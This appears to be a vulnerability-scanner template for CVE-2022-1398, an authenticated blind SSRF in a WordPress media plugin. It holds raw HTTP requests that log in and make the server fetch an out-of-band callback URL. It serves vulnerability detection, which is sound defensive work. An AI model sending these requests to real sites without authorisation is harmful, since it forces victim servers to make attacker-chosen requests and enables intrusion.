id: CVE-2022-1398

info:
  name: External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery
  author: theamanrawat
  severity: medium
  description: |
    WordPress External Media without Import plugin through 1.1.2 is susceptible to authenticated blind server-side request forgery. The plugin has no authorization and does not ensure that media added via URLs are external media, which can allow any authenticated users, including subscribers, to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  reference:
    - https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e
    - https://wordpress.org/plugins/external-media-without-import/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1398
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-1398
    cwe-id: CWE-981
    cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:*:*:*
    epss-score: 0.00319
  metadata:
    max-request: 3
    verified: "true"
  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/upload.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        urls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body_2
        words:
          - "external-media-without-import"

# Enhanced by md on 2023/04/06